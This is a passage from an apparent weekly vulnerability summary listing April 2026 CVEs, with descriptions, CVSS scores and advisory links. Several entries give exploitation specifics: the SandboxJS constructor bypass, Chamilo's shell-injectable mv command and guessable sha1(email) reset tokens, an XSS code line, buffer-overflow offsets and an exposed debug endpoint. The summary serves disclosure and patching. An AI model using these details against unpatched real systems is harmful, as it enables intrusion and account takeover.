| PureStorage--FlashBlade | A vulnerability exists in FlashBlade whereby sensitive information may be logged under specific conditions. | 2026-04-14 | not yet calculated | CVE-2026-0207 | https://support.purestorage.com/bundle/m_security_bulletins/page/Pure_Security/topics/concept/c_security_bulletins.html |
| PureStorage--FlashArray | Under certain administrative conditions, FlashArray Purity may apply snapshot retention policies earlier or later than configured. | 2026-04-14 | not yet calculated | CVE-2026-0209 | https://support.purestorage.com/bundle/m_security_bulletins/page/Pure_Security/topics/concept/c_security_bulletins.html |
| Palo Alto Networks--Cortex XDR Agent | A problem with a protection mechanism in the Palo Alto Networks Cortex XDR agent on Windows allows a local Windows administrator to disable the agent. This issue may be leveraged by malware to perform malicious activity without detection. | 2026-04-13 | not yet calculated | CVE-2026-0232 | https://security.paloaltonetworks.com/CVE-2026-0232 |
| Palo Alto Networks--Autonomous Digital Experience Manager | A certificate validation vulnerability in Palo Alto Networks Autonomous Digital Experience Manager on Windows allows an unauthenticated attacker with adjacent network access to execute arbitrary code with NT AUTHORITY\SYSTEM privileges. | 2026-04-13 | not yet calculated | CVE-2026-0233 | https://security.paloaltonetworks.com/CVE-2026-0233 |
| Palo Alto Networks--Cortex XSOAR Microsoft Teams Marketplace | An improper verification of cryptographic signature vulnerability exists in Cortex XSOAR and Cortex XSIAM platforms during integration of Microsoft Teams that enables an unauthenticated user to access and modify protected resources. | 2026-04-13 | not yet calculated | CVE-2026-0234 | https://security.paloaltonetworks.com/CVE-2026-0234 |
| Legion of the Bouncy Castle Inc.--BC-JAVA | Improper neutralization of special elements used in an LDAP query ('LDAP injection') vulnerability in Legion of the Bouncy Castle Inc. BC-JAVA bcprov on all (prov modules). This vulnerability is associated with program files LDAPStoreHelper. This issue affects BC-JAVA: from 1.74 before 1.84. | 2026-04-15 | not yet calculated | CVE-2026-0636 | https://github.com/bcgit/bc-java/wiki/CVE%E2%80%902026%E2%80%900636 https://github.com/bcgit/bc-java/commit/d20cdb8430e09224114fec0179a71859929fcbde |
| keras-team--keras-team/keras | A vulnerability in the `TFSMLayer` class of the `keras` package, version 3.13.0, allows attacker-controlled TensorFlow SavedModels to be loaded during deserialization of `.keras` models, even when `safe_mode=True`. This bypasses the security guarantees of `safe_mode` and enables arbitrary attacker-controlled code execution during model inference under the victim's privileges. The issue arises due to the unconditional loading of external SavedModels, serialization of attacker-controlled file paths, and the lack of validation in the `from_config()` method. | 2026-04-13 | not yet calculated | CVE-2026-1462 | https://huntr.com/bounties/7e78d6f1-6977-4300-b595-e81bdbda331c https://github.com/keras-team/keras/commit/b6773d3decaef1b05d8e794458e148cb362f163f |
| Pegasystems--Pega Infinity | Pega Platform versions 8.1.0 through 25.1.1 are affected by an HTML Injection vulnerability in a user interface component. Requires a high privileged user with a developer role. | 2026-04-15 | not yet calculated | CVE-2026-1564 | https://support.pega.com/support-doc/pega-security-advisory-b26-vulnerability-remediation-note |
| Pegasystems--Pega Infinity | Pega Platform versions 8.1.0 through 25.1.1 are affected by a Stored Cross-Site Scripting vulnerability in a user interface component. Requires a high privileged user with a developer role. | 2026-04-15 | not yet calculated | CVE-2026-1711 | https://support.pega.com/support-doc/pega-security-advisory-d26-vulnerability-remediation-note |
| ASUS--DriverHub | An Incorrect Permission Assignment for Critical Resource vulnerability in the ASUS DriverHub update process allows privilege escalation due to improper protection of required execution resources during the validation phase, permitting a local user to make unprivileged modifications. This allows the altered resource to pass system checks and be executed with elevated privileges upon a user-initiated update. Refer to the 'Security Update for ASUS DriverHub' section on the ASUS Security Advisory for more information. | 2026-04-16 | not yet calculated | CVE-2026-1880 | https://www.asus.com/security-advisory |
| Samsung Mobile--Samsung Mobile Devices | Improper input validation in data related to network restrictions prior to SMR Apr-2026 Release 1 allows physical attackers to bypass the restrictions. | 2026-04-13 | not yet calculated | CVE-2026-21003 | https://security.samsungmobile.com/securityUpdate.smsb?year=2026&month=04 |
| Samsung Mobile--Samsung Mobile Devices | Improper access control in Samsung DeX prior to SMR Apr-2026 Release 1 allows physical attackers to access to hidden notification contents. | 2026-04-13 | not yet calculated | CVE-2026-21006 | https://security.samsungmobile.com/securityUpdate.smsb?year=2026&month=04 |
| Samsung Mobile--Samsung Mobile Devices | Improper check for exceptional conditions in Device Care prior to SMR Apr-2026 Release 1 allows physical attackers to bypass Knox Guard. | 2026-04-13 | not yet calculated | CVE-2026-21007 | https://security.samsungmobile.com/securityUpdate.smsb?year=2026&month=04 |
| Samsung Mobile--Samsung Mobile Devices | Exposure of sensitive information in S Share prior to SMR Apr-2026 Release 1 allows adjacent attacker to access sensitive information. | 2026-04-13 | not yet calculated | CVE-2026-21008 | https://security.samsungmobile.com/securityUpdate.smsb?year=2026&month=04 |
| Samsung Mobile--Samsung Mobile Devices | Improper check for exceptional conditions in Recents prior to SMR Apr-2026 Release 1 allows physical attacker to bypass App Pinning. | 2026-04-13 | not yet calculated | CVE-2026-21009 | https://security.samsungmobile.com/securityUpdate.smsb?year=2026&month=04 |
| Samsung Mobile--Samsung Mobile Devices | Incorrect privilege assignment in Bluetooth in Maintenance mode prior to SMR Apr-2026 Release 1 allows physical attackers to bypass Extend Unlock. | 2026-04-13 | not yet calculated | CVE-2026-21011 | https://security.samsungmobile.com/securityUpdate.smsb?year=2026&month=04 |
| Samsung Mobile--Samsung Mobile Devices | External control of file name in AODManager prior to SMR Apr-2026 Release 1 allows privileged local attacker to create file with system privilege. | 2026-04-13 | not yet calculated | CVE-2026-21012 | https://security.samsungmobile.com/securityUpdate.smsb?year=2026&month=04 |
| Samsung Mobile--Galaxy Wearable | Incorrect default permission in Galaxy Wearable prior to version 2.2.68.26 allows local attackers to access sensitive information. | 2026-04-13 | not yet calculated | CVE-2026-21013 | https://security.samsungmobile.com/serviceWeb.smsb?year=2026&month=04 |
| Samsung Mobile--Samsung Camera | Improper access control in Samsung Camera prior to version 16.5.00.28 allows local attacker to access location data. User interaction is required for triggering this vulnerability. | 2026-04-13 | not yet calculated | CVE-2026-21014 | https://security.samsungmobile.com/serviceWeb.smsb?year=2026&month=04 |
| Veeam--Backup and Replication | A vulnerability allowing a local attacker with administrator privileges to bypass Windows Driver Signature Enforcement. | 2026-04-17 | not yet calculated | CVE-2026-21709 | https://www.veeam.com/kb4830 https://www.veeam.com/kb4831 |
| CubeCart Limited--CubeCart | An OS command injection vulnerability exists in CubeCart prior to 6.6.0, which may allow a user with an administrative privilege to execute an arbitrary OS command. | 2026-04-17 | not yet calculated | CVE-2026-21719 | https://community.cubecart.com/t/cubecart-6-6-0-released-the-biggest-update-in-years/62405 https://jvn.jp/en/jp/JVN78422311/ |
| Imagination Technologies--Graphics DDK | Software installed and run as a non-privileged user may conduct improper GPU system calls to gain write permission to read-only wrapped user-mode memory and files. This is caused by improper handling of GPU memory reservation protections. | 2026-04-17 | not yet calculated | CVE-2026-21733 | https://www.imaginationtech.com/gpu-driver-vulnerabilities/ |
| Ubiquiti Inc--UniFi Play PowerAmp | An Improper Input Validation vulnerability could allow a malicious actor with access to the UniFi Play network to cause the device to stop responding. Affected Products: UniFi Play PowerAmp (Version 1.0.35 and earlier) UniFi Play Audio Port (Version 1.0.24 and earlier) Mitigation: Update UniFi Play PowerAmp to Version 1.0.38 or later Update UniFi Play Audio Port to Version 1.1.9 or later | 2026-04-13 | not yet calculated | CVE-2026-22565 | https://community.ui.com/releases/Security-Advisory-Bulletin-063/e468dd4b-5090-4ef8-89d8-939903c08e83 |
| Microchip--IStaX | A privilege escalation vulnerability in Microchip IStaX allows an authenticated low-privileged user to recover a shared per-device cookie secret from their own webstax_auth session cookie and forge a new cookie with administrative privileges.This issue affects IStaX before 2026.03. | 2026-04-16 | not yet calculated | CVE-2026-2336 | https://www.microchip.com/en-us/solutions/technologies/embedded-security/how-to-report-potential-product-security-vulnerabilities/istax-privilege-escalation-via-weak-cookie-authentication |
Vulnerability Summary for the Week of April 6, 2026
Posted on Tuesday April 14, 2026
High Vulnerabilities
| Primary Vendor -- Product |
Description | Published | CVSS Score | Source Info | Patch Info |
|---|---|---|---|---|---|
| nyariv--SandboxJS | SandboxJS is a JavaScript sandboxing library. Prior to 0.8.36, SandboxJS blocks direct assignment to global objects (for example Math.random = ...), but this protection can be bypassed through an exposed callable constructor path: this.constructor.call(target, attackerObject). Because this.constructor resolves to the internal SandboxGlobal function and Function.prototype.call is allowed, attacker code can write arbitrary properties into host global objects and persist those mutations across sandbox instances in the same process. This vulnerability is fixed in 0.8.36. | 2026-04-06 | 10 | CVE-2026-34208 | https://github.com/nyariv/SandboxJS/security/advisories/GHSA-2gg9-6p7w-6cpj |
| Davidtavarez--CF Image Hosting Script | CF Image Hosting Script 1.6.5 allows unauthenticated attackers to download and decode the application database by accessing the imgdb.db file in the upload/data directory. Attackers can extract delete IDs stored in plaintext from the deserialized database and use them to delete all pictures via the d parameter. | 2026-04-12 | 9.8 | CVE-2019-25709 | ExploitDB-46094 Official Product Homepage Product Reference VulnCheck Advisory: CF Image Hosting Script 1.6.5 Unauthorized Database Access |
| Beijing Topsec Network Security Technology Co., Ltd.--Tianxin Internet Behavior Management System | Tianxin Internet Behavior Management System contains a command injection vulnerability in the Reporter component endpoint that allows unauthenticated attackers to execute arbitrary commands by supplying a crafted objClass parameter containing shell metacharacters and output redirection. Attackers can exploit this vulnerability to write malicious PHP files into the web root and achieve remote code execution with the privileges of the web server process. This vulnerability has been fixed in version NACFirmware_4.0.0.7_20210716.180815_topsec_0_basic.bin. Exploitation evidence was first observed by the Shadowserver Foundation on 2024-06-01 (UTC). | 2026-04-07 | 9.8 | CVE-2021-4473 | https://www.cnvd.org.cn/flaw/show/CNVD-2021-41972 https://www.cnvd.org.cn/patchInfo/show/280166 https://cn-sec.com/archives/4631959.html https://avd.aliyun.com/detail?id=AVD-2021-890232 https://www.vulncheck.com/advisories/tianxin-internet-behavior-management-system-command-injection-via-toquery-php |
| Contemporary Controls--BASControl20 | An attacker could use data obtained by sniffing the network traffic to forge packets in order to make arbitrary requests to Contemporary Controls BASC 20T. | 2026-04-09 | 9.8 | CVE-2025-13926 | https://www.ccontrols.com/support/contacttech.htm https://www.cisa.gov/news-events/ics-advisories/icsa-26-099-01 https://github.com/cisagov/CSAF/blob/develop/csaf_files/OT/white/2026/icsa-26-099-01.json |
| SaturdayDrive--Ninja Forms - File Uploads | The Ninja Forms - File Uploads plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation in the 'NF_FU_AJAX_Controllers_Uploads::handle_upload' function in all versions up to, and including, 3.3.26. This makes it possible for unauthenticated attackers to upload arbitrary files on the affected site's server which may make remote code execution possible. Note: The vulnerability was partially patched in version 3.3.25 and fully patched in version 3.3.27. | 2026-04-07 | 9.8 | CVE-2026-0740 | https://www.wordfence.com/threat-intel/vulnerabilities/id/0b606ded-ab50-486a-9337-97ee9f452f12?source=cve https://ninjaforms.com/extensions/file-uploads/ |
| IBM--Verify Identity Access Container | IBM Verify Identity Access Container 11.0 through 11.0.2 and IBM Security Verify Access Container 10.0 through 10.0.9.1 and IBM Verify Identity Access 11.0 through 11.0.2 and IBM Security Verify Access 10.0 through 10.0.9.1 could allow a locally authenticated user to escalate their privileges to root due to execution with unnecessary privileges than required. | 2026-04-08 | 9.3 | CVE-2026-1346 | https://www.ibm.com/support/pages/node/7268253 |
| davidfcarr--Quick Playground | The Quick Playground plugin for WordPress is vulnerable to Remote Code Execution in all versions up to, and including, 1.3.1. This is due to insufficient authorization checks on REST API endpoints that expose a sync code and allow arbitrary file uploads. This makes it possible for unauthenticated attackers to retrieve the sync code, upload PHP files with path traversal, and achieve remote code execution on the server. | 2026-04-09 | 9.8 | CVE-2026-1830 | https://www.wordfence.com/threat-intel/vulnerabilities/id/308cd28a-a477-4bc6-a392-ad5a9eca1cb5?source=cve https://plugins.trac.wordpress.org/browser/quick-playground/trunk/api.php#L39 https://plugins.trac.wordpress.org/browser/quick-playground/trunk/expro-api.php#L419 https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3500839%40quick-playground&new=3500839%40quick-playground&sfp_email=&sfph_mail= |
| LibRaw--LibRaw | A heap-based buffer overflow vulnerability exists in the x3f_thumb_loader functionality of LibRaw Commit d20315b. A specially crafted malicious file can lead to a heap buffer overflow. An attacker can provide a malicious file to trigger this vulnerability. | 2026-04-07 | 9.8 | CVE-2026-20889 | https://talosintelligence.com/vulnerability_reports/TALOS-2026-2358 |
| LibRaw--LibRaw | A heap-based buffer overflow vulnerability exists in the HuffTable::initval functionality of LibRaw Commit 0b56545 and Commit d20315b. A specially crafted malicious file can lead to a heap buffer overflow. An attacker can provide a malicious file to trigger this vulnerability. | 2026-04-07 | 9.8 | CVE-2026-20911 | https://talosintelligence.com/vulnerability_reports/TALOS-2026-2330 |
| LibRaw--LibRaw | A heap-based buffer overflow vulnerability exists in the lossless_jpeg_load_raw functionality of LibRaw Commit 0b56545 and Commit d20315b. A specially crafted malicious file can lead to a heap buffer overflow. An attacker can provide a malicious file to trigger this vulnerability. | 2026-04-07 | 9.8 | CVE-2026-21413 | https://talosintelligence.com/vulnerability_reports/TALOS-2026-2331 |
| Weaver Network Co., Ltd.--E-cology | Weaver (Fanwei) E-cology 10.0 versions prior to 20260312 contain an unauthenticated remote code execution vulnerability in the /papi/esearch/data/devops/dubboApi/debug/method endpoint that allows attackers to execute arbitrary commands by invoking exposed debug functionality. Attackers can craft POST requests with attacker-controlled interfaceName and methodName parameters to reach command-execution helpers and achieve arbitrary command execution on the system. Exploitation evidence was first observed by the Shadowserver Foundation on 2026-03-31 (UTC). | 2026-04-07 | 9.8 | CVE-2026-22679 | https://www.weaver.com.cn/cs/securityDownload.html# https://h4cker.zip/post/d5d211/ https://ti.qianxin.com/vulnerability/notice-detail/1760 https://www.vulncheck.com/advisories/weaver-e-cology-unauthenticated-rce-via-dubboapi-debug-endpoint |
| prosolution--ProSolution WP Client | The ProSolution WP Client plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation in the 'proSol_fileUploadProcess' function in all versions up to, and including, 1.9.9. This makes it possible for unauthenticated attackers to upload arbitrary files on the affected site's server which may make remote code execution possible. | 2026-04-08 | 9.8 | CVE-2026-2942 | https://www.wordfence.com/threat-intel/vulnerabilities/id/3852aef6-42e7-4b71-a1ba-dd41284fd07b?source=cve https://plugins.trac.wordpress.org/browser/prosolution-wp-client/trunk/public/class-prosolwpclient-public.php?rev=3331282#L993 https://plugins.trac.wordpress.org/changeset/3484577/prosolution-wp-client |
| Rukovoditel--Rukovoditel CRM | A reflected cross-site scripting (XSS) vulnerability exists in Rukovoditel CRM version 3.6.4 and earlier in the Zadarma telephony API endpoint (/api/tel/zadarma.php). The application directly reflects user-supplied input from the 'zd_echo' GET parameter into the HTTP response without proper sanitization, output encoding, or content-type restrictions. The vulnerable code is: if (isset($_GET['zd_echo'])) exit($_GET['zd_echo']); An unauthenticated attacker can exploit this issue by crafting a malicious URL containing JavaScript payloads. When a victim visits the link, the payload executes in the context of the application within the victim's browser, potentially leading to session hijacking, credential theft, phishing, or account takeover. The issue is fixed in version 3.7, which introduces proper input validation and output encoding to prevent script injection. | 2026-04-11 | 9.3 | CVE-2026-31845 | https://forum.rukovoditel.net/viewtopic.php?p=22499#p22499 |
| chamilo--chamilo-lms | Chamilo LMS is a learning management system. Prior to 1.11.38 and 2.0.0-RC.3, Chamilo LMS contains an OS Command Injection vulnerability in the file move function. The move() function in fileManage.lib.php passes user-controlled path values directly into exec() shell commands without using escapeshellarg(). When a user moves a document via document.php, the move_to POST parameter - which only passes through Security::remove_XSS() (an HTML-only filter) - is concatenated directly into shell commands such as exec("mv $source $target"). By default, Chamilo allows all authenticated users to create courses (allow_users_to_create_courses = true). Any user who is a teacher in a course (including self-created courses) can move documents, making this vulnerability exploitable by any authenticated user. The attacker must first place a directory with shell metacharacters in its name on the filesystem (achievable via Course Backup Import), then move a document into that directory to trigger arbitrary command execution as the web server user (www-data). This vulnerability is fixed in 1.11.38 and 2.0.0-RC.3. | 2026-04-10 | 9.1 | CVE-2026-32892 | https://github.com/chamilo/chamilo-lms/security/advisories/GHSA-59cv-qh65-vvrr https://github.com/chamilo/chamilo-lms/commit/3597b19b73d73d681e4fb503285e9bbfe71714bf https://github.com/chamilo/chamilo-lms/commit/62671e5e268f235cddfba704edee90f35c234df1 |
| wpeverest--Everest Forms Contact Form, Payment Form, Quiz, Survey & Custom Form Builder | The Everest Forms plugin for WordPress is vulnerable to PHP Object Injection in all versions up to, and including, 3.4.3 via deserialization of untrusted input from form entry metadata. This is due to the html-admin-page-entries-view.php file calling PHP's native unserialize() on stored entry meta values without passing the allowed_classes parameter. This makes it possible for unauthenticated attackers to inject a serialized PHP object payload through any public Everest Forms form field. The payload survives sanitize_text_field() sanitization (serialization control characters are not stripped) and is stored in the wp_evf_entrymeta database table. When an administrator views entries or views an individual entry, the unsafe unserialize() call processes the stored data without class restrictions. | 2026-04-08 | 9.8 | CVE-2026-3296 | https://www.wordfence.com/threat-intel/vulnerabilities/id/2693ae37-790d-4b18-a9ec-054c8c27b8bc?source=cve https://plugins.trac.wordpress.org/browser/everest-forms/tags/3.4.3/includes/admin/views/html-admin-page-entries-view.php#L133 https://plugins.trac.wordpress.org/browser/everest-forms/trunk/includes/admin/views/html-admin-page-entries-view.php#L133 https://plugins.trac.wordpress.org/browser/everest-forms/tags/3.4.3/includes/evf-core-functions.php#L5594 https://plugins.trac.wordpress.org/changeset/3489938/everest-forms/tags/3.4.4/readme.txt?old=3464753&old_path=everest-forms%2Ftags%2F3.4.3%2Freadme.txt https://plugins.trac.wordpress.org/changeset?old_path=/everest-forms/tags/3.4.3&new_path=/everest-forms/tags/3.4.4 |
| chamilo--chamilo-lms | Chamilo LMS is a learning management system. Prior to 1.11.38 and 2.0.0-RC.3, the default password reset mechanism generates tokens using sha1($email) with no random component, no expiration, and no rate limiting. An attacker who knows a user's email can compute the reset token and change the victim's password without authentication. This vulnerability is fixed in 1.11.38 and 2.0.0-RC.3. | 2026-04-10 | 9.4 | CVE-2026-33707 | https://github.com/chamilo/chamilo-lms/security/advisories/GHSA-f27g-66gq-g7v2 https://github.com/chamilo/chamilo-lms/commit/078d7e5b77679fa7ccfcd6783bd5cc683db0bda8 https://github.com/chamilo/chamilo-lms/commit/750a45312a0d5c3ad60dbfbd0d959ca40be4a18c |
| Juniper Networks--JSI LWC | A Use of Default Password vulnerability in the Juniper Networks Support Insights (JSI) Virtual Lightweight Collector (vLWC) allows an unauthenticated, network-based attacker to take full control of the device. vLWC software images ship with an initial password for a high privileged account. A change of this password is not enforced during the provisioning of the software, which can make full access to the system by unauthorized actors possible.This issue affects all versions of vLWC before 3.0.94. | 2026-04-09 | 9.8 | CVE-2026-33784 | https://kb.juniper.net/JSA107871 |
| Canonical--lxd | Canonical LXD versions 4.12 through 6.7 contain an incomplete denylist in isVMLowLevelOptionForbidden (lxd/project/limits/permissions.go), which omits raw.apparmor and raw.qemu.conf from the set of keys blocked under the restricted.virtual-machines.lowlevel=block project restriction. A remote attacker with can_edit permission on a VM instance in a restricted project can inject an AppArmor rule and a QEMU chardev configuration that bridges the LXD Unix socket into the guest VM, enabling privilege escalation to LXD cluster administrator and subsequently to host root. | 2026-04-09 | 9.1 | CVE-2026-34177 | VM lowlevel restriction bypass via raw.apparmor and raw.qemu.conf lxd: Prevent use of raw.apparmor and raw.qemu.conf when low level options are blocked |
| Canonical--lxd | In Canonical LXD before 6.8, the backup import path validates project restrictions against backup/index.yaml in the supplied tar archive but creates the instance from backup/container/backup.yaml, a separate file in the same archive that is never checked against project restrictions. An authenticated remote attacker with instance-creation permission in a restricted project can craft a backup archive where backup.yaml carries restricted settings such as security.privileged=true or raw.lxc directives, bypassing all project restriction enforcement and allowing full host compromise. | 2026-04-09 | 9.1 | CVE-2026-34178 | Importing a crafted backup leads to project restriction bypass Import: Create backup config from index |
| Canonical--lxd | In Canonical LXD versions 4.12 through 6.7, the doCertificateUpdate function in lxd/certificates.go does not validate the Type field when handling PUT/PATCH requests to /1.0/certificates/{fingerprint} for restricted TLS certificate users, allowing a remote authenticated attacker to escalate privileges to cluster admin. | 2026-04-09 | 9.1 | CVE-2026-34179 | Update of type field in restricted TLS certificate allows privilege escalation to cluster admin Improve validation on certificate edit |
| Nextendweb--Smart Slider 3 Pro for WordPress | Smart Slider 3 Pro version 3.5.1.35 for WordPress and Joomla contains a multi-stage remote access toolkit injected through a compromised update system that allows unauthenticated attackers to execute arbitrary code and commands. Attackers can trigger pre-authentication remote shell execution via HTTP headers, establish authenticated backdoors accepting arbitrary PHP code or OS commands, create hidden administrator accounts, exfiltrate credentials and access keys, and maintain persistence through multiple injection points including must-use plugins and core file modifications. | 2026-04-09 | 9.8 | CVE-2026-34424 | https://smartslider.helpscoutdocs.com/article/2144-wordpress-security-advisory-smart-slider-3-pro-3-5-1-35-compromise https://smartslider.helpscoutdocs.com/article/2143-joomla-security-advisory-smart-slider-3-pro-3-5-1-35-compromise https://patchstack.com/database/wordpress/plugin/nextend-smart-slider3-pro/vulnerability/wordpress-smart-slider-3-plugin-3-5-1-35-backdoor-vulnerability https://patchstack.com/articles/critical-supply-chain-compromise-in-smart-slider-3-pro-full-malware-analysis/ https://mysites.guru/blog/smart-slider-3-pro-supply-chain-compromise/ |
| usebruno--bruno | Bruno is an open source IDE for exploring and testing APIs. Prior to 3.2.1, Bruno was affected by a supply chain attack involving compromised versions of the axios npm package, which introduced a hidden dependency deploying a cross-platform Remote Access Trojan (RAT). Users of @usebruno/cli who ran npm install between 00:21 UTC and ~03:30 UTC on March 31, 2026 may have been impacted. Upgrade to 3.2.1 | 2026-04-06 | 9.8 | CVE-2026-34841 | https://github.com/usebruno/bruno/security/advisories/GHSA-658g-p7jg-wx5g https://github.com/axios/axios/issues/10604 https://github.com/usebruno/bruno/pull/7632 https://www.aikido.dev/blog/axios-npm-compromised-maintainer-hijacked-rat |
| R-Project--RGui | RGui 3.5.0 contains a local buffer overflow vulnerability in the GUI preferences dialog that allows attackers to bypass DEP protections through structured exception handling exploitation. Attackers can craft malicious input in the Language for menus and messages field to trigger a stack-based buffer overflow, execute a ROP chain for VirtualAlloc allocation, and achieve arbitrary code execution. | 2026-04-12 | 8.4 | CVE-2018-25258 | ExploitDB-46107 Official Product Homepage Product Reference VulnCheck Advisory: RGui 3.5.0 Local Buffer Overflow SEH DEP Bypass |
| Html5Videoplayer--HTML5 Video Player | HTML5 Video Player 1.2.5 contains a local buffer overflow vulnerability that allows attackers to execute arbitrary code by supplying an oversized key code string. Attackers can craft a malicious payload exceeding 997 bytes and paste it into the KEY CODE field in the Help Register dialog to trigger code execution and spawn a calculator process. | 2026-04-12 | 8.4 | CVE-2019-25689 | ExploitDB-46279 Official Product Homepage VulnCheck Advisory: HTML5 Video Player 1.2.5 Local Buffer Overflow Non-SEH |
| Faleemi--Faleemi Desktop Software | Faleemi Desktop Software 1.8 contains a local buffer overflow vulnerability in the System Setup dialog that allows attackers to bypass DEP protections through structured exception handling exploitation. Attackers can inject a crafted payload into the Save Path for Snapshot and Record file field to trigger a buffer overflow and execute arbitrary code via ROP chain gadgets. | 2026-04-12 | 8.4 | CVE-2019-25691 | ExploitDB-46269 Official Product Homepage VulnCheck Advisory: Faleemi Desktop Software 1.8 Local Buffer Overflow SEH DEP Bypass |
| r-project--R | R 3.4.4 contains a local buffer overflow vulnerability that allows attackers to execute arbitrary code by injecting malicious input into the GUI Preferences language field. Attackers can craft a payload with a 292-byte offset and JMP ESP instruction to execute commands like calc.exe when the payload is pasted into the Language for menus and messages field. | 2026-04-12 | 8.4 | CVE-2019-25695 | ExploitDB-46265 Official Product Homepage VulnCheck Advisory: R 3.4.4 Local Buffer Overflow Windows XP SP3 |
| VictorAlagwu--CMSsite | CMSsite 1.0 contains an SQL injection vulnerability that allows unauthenticated attackers to manipulate database queries by injecting SQL code through the cat_id parameter. Attackers can send GET requests to category.php with malicious cat_id values to extract sensitive database information including usernames and credentials. | 2026-04-12 | 8.2 | CVE-2019-25697 | ExploitDB-46259 Product Reference VulnCheck Advisory: CMSsite 1.0 SQL Injection via category.php |
| Divxtodvd--Easy Video to iPod Converter | Easy Video to iPod Converter 1.6.20 contains a local buffer overflow vulnerability in the user registration field that allows local attackers to overwrite the structured exception handler. Attackers can input a crafted payload exceeding 996 bytes in the username field to trigger SEH overwrite and execute arbitrary code with user privileges. | 2026-04-12 | 8.4 | CVE-2019-25701 | ExploitDB-46255 Official Product Homepage Product Reference VulnCheck Advisory: Easy Video to iPod Converter 1.6.20 Local Buffer Overflow SEH |
| Sourceforge--Echo Mirage | Echo Mirage 3.1 contains a stack buffer overflow vulnerability that allows local attackers to crash the application or execute arbitrary code by supplying an oversized string in the Rules action field. Attackers can create a malicious text file with a crafted payload exceeding buffer boundaries and paste it into the action field through the Rules dialog to trigger the overflow and overwrite the return address. | 2026-04-12 | 8.4 | CVE-2019-25705 | ExploitDB-46216 Official Product Homepage Product Reference VulnCheck Advisory: Echo Mirage 3.1 Stack Buffer Overflow via Rules Action Field |
| Dolibarr--Dolibarr ERP-CRM | Dolibarr ERP-CRM 8.0.4 contains an SQL injection vulnerability in the rowid parameter of the admin dict.php endpoint that allows attackers to execute arbitrary SQL queries. Attackers can inject malicious SQL code through the rowid POST parameter to extract sensitive database information using error-based SQL injection techniques. | 2026-04-12 | 8.2 | CVE-2019-25710 | ExploitDB-46095 Official Product Homepage Product Reference VulnCheck Advisory: Dolibarr ERP-CRM 8.0.4 SQL Injection via rowid Parameter |
| Synology--Synology SSL VPN Client | A plaintext storage of a password vulnerability in Synology SSL VPN Client before 1.4.5-0684 allows remote attackers to access or influence the user's PIN code due to insecure storage. This may lead to unauthorized VPN configuration and potential interception of subsequent VPN traffic when combined with user interaction. | 2026-04-10 | 8.1 | CVE-2021-47961 | Synology-SA-26:05 Synology SSL VPN Client |
| Adivaha--WordPress adivaha Travel Plugin | WordPress adivaha Travel Plugin 2.3 contains a time-based blind SQL injection vulnerability that allows unauthenticated attackers to manipulate database queries by injecting SQL code through the 'pid' GET parameter. Attackers can send requests to the /mobile-app/v3/ endpoint with crafted 'pid' values using XOR-based payloads to extract sensitive database information or cause denial of service. | 2026-04-09 | 8.2 | CVE-2023-54359 | ExploitDB-51655 Official Product Homepage Product Reference VulnCheck Advisory: WordPress adivaha Travel Plugin 2.3 SQL Injection via pid |
| Juniper Networks--Apstra | A Key Exchange without Entity Authentication vulnerability in the SSH implementation of Juniper Networks Apstra allows a unauthenticated, MITM attacker to impersonate managed devices. Due to insufficient SSH host key validation an attacker can perform a machine-in-the-middle attack on the SSH connections from Apstra to managed devices, enabling an attacker to impersonate a managed device and capture user credentials. This issue affects all versions of Apstra before 6.1.1. | 2026-04-09 | 8.7 | CVE-2025-13914 | https://kb.juniper.net/JSA107862 |
| Qualcomm, Inc.--Snapdragon | Memory corruption when decoding corrupted satellite data files with invalid signature offsets. | 2026-04-06 | 8.8 | CVE-2025-47392 | https://docs.qualcomm.com/product/publicresources/securitybulletin/april-2026-bulletin.html |
| CactusThemes--VideoPro | Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in CactusThemes VideoPro allows PHP Local File Inclusion.This issue affects VideoPro: from n/a through 2.3.8.1. | 2026-04-10 | 8.1 | CVE-2025-58913 | https://patchstack.com/database/wordpress/theme/videopro/vulnerability/wordpress-videopro-theme-2-3-8-1-local-file-inclusion-vulnerability?_s_id=cve |
| Hitachi--JP1/IT Desktop Management 2 - Manager | Remote Code Execution Vulnerability in JP1/IT Desktop Management 2 - Manager on Windows, JP1/IT Desktop Management 2 - Operations Director on Windows, Job Management Partner 1/IT Desktop Management 2 - Manager on Windows, JP1/IT Desktop Management - Manager on Windows, Job Management Partner 1/IT Desktop Management - Manager on Windows, JP1/NETM/DM Manager on Windows, JP1/NETM/DM Client on Windows, Job Management Partner 1/Software Distribution Manager on Windows, Job Management Partner 1/Software Distribution Client on Windows.This issue affects JP1/IT Desktop Management 2 - Manager: from 13-50 before 13-50-02, from 13-11 before 13-11-04, from 13-10 before 13-10-07, from 13-01 before 13-01-07, from 13-00 before 13-00-05, from 12-60 before 12-60-12, from 10-50 through 12-50-11; JP1/IT Desktop Management 2 - Operations Director: from 13-50 before 13-50-02, from 13-11 before 13-11-04, from 13-10 before 13-10-07, from 13-01 before 13-01-07, from 13-00 before 13-00-05, from 12-60 before 12-60-12, from 10-50 through 12-50-11; Job Management Partner 1/IT Desktop Management 2 - Manager: from 10-50 through 10-50-11; JP1/IT Desktop Management - Manager: from 09-50 through 10-10-16; Job Management Partner 1/IT Desktop Management - Manager: from 09-50 through 10-10-16; JP1/NETM/DM Manager: from 09-00 through 10-20-02; JP1/NETM/DM Client: from 09-00 through 10-20-02; Job Management Partner 1/Software Distribution Manager: from 09-00 through 09-51-13; Job Management Partner 1/Software Distribution Client: from 09-00 through 09-51-13. | 2026-04-07 | 8.8 | CVE-2025-65115 | https://www.hitachi.com/products/it/software/security/info/vuls/hitachi-sec-2026-118/index.html |
| IBM--Verify Identity Access Container | IBM Verify Identity Access Container 11.0 through 11.0.2 and IBM Security Verify Access Container 10.0 through 10.0.9.1 and IBM Verify Identity Access 11.0 through 11.0.2 and IBM Security Verify Access 10.0 through 10.0.9.1 could allow a locally authenticated user to execute malicious scripts from outside of its control sphere. | 2026-04-07 | 8.5 | CVE-2026-1342 | https://www.ibm.com/support/pages/node/7268253 |
| LibRaw--LibRaw | An integer overflow vulnerability exists in the deflate_dng_load_raw functionality of LibRaw Commit 8dc68e2. A specially crafted malicious file can lead to a heap buffer overflow. An attacker can provide a malicious file to trigger this vulnerability. | 2026-04-07 | 8.1 | CVE-2026-20884 | https://talosintelligence.com/vulnerability_reports/TALOS-2026-2364 |
